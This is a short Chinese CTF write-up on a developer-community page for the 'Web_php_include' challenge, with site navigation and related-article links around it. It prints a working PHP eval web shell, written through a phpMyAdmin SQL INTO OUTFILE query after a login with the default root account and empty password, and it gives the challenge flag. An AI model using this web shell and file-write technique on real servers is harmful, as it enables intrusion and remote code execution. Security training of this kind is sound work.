开发者社区安全文章正文

攻防世界-Web_php_include

2023-11-23 56

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 攻防世界-Web_php_include

先用御剑扫一下

发现有phpmyadmin的登录地址

http://61.147.171.105:64507/phpmyadmin/

phpMyAdmin默认已有root用户，其默认密码为空

登陆成功后在SQL查询里执行一句话木马

select "<?php @eval($_POST['1']);?>" into outfile '/tmp/1.php'

则要连接的URL为 http://61.147.171.105:64507/?page=/tmp/1.php

使用蚁剑，先测试一下，连接成功

拿到flag

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

文章标签：

PHP

SQL

数据安全/隐私保护

安全

关键词：

攻防PHP

攻防web

Myon

weixin_836869520

4月前

SQL 监控安全

Java Web应用的安全防护与攻防策略

weixin_836869520

85 2 2

Safenetworkaccess

6月前

数据安全/隐私保护

攻防世界13-simple_php

Safenetworkaccess

66 1 1

Safenetworkaccess

6月前

攻防世界12-baby_web

Safenetworkaccess

65 1 1

不拿flag不改名

6月前

攻防世界---baby_web

不拿flag不改名

62 0 0

不拿flag不改名

6月前

数据安全/隐私保护

攻防世界web-----easyupload

不拿flag不改名

195 0 0

不拿flag不改名

6月前

Go PHP

攻防世界web---fileinclude

不拿flag不改名

239 0 0

Jay17

3月前

存储 PHP 数据安全/隐私保护

攻防世界 Web_php_unserialize

Jay17

51 0 0

泥腿子架构师

4月前

SQL 安全 Java

Java Web应用的安全防护与攻防深度剖析

泥腿子架构师

59 1 1

聚娃科技开发者团队

4月前

SQL 监控安全

Java Web应用的安全防护与攻防策略

聚娃科技开发者团队

59 0 0

不拿flag不改名

6月前

攻防世界---web---warmup

不拿flag不改名

54 0 0

攻防世界-Web_php_include

热门文章

最新文章

相关课程

相关电子书

相关实验场景

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

攻防世界-Web_php_include

热门文章

最新文章

相关课程

相关电子书

相关实验场景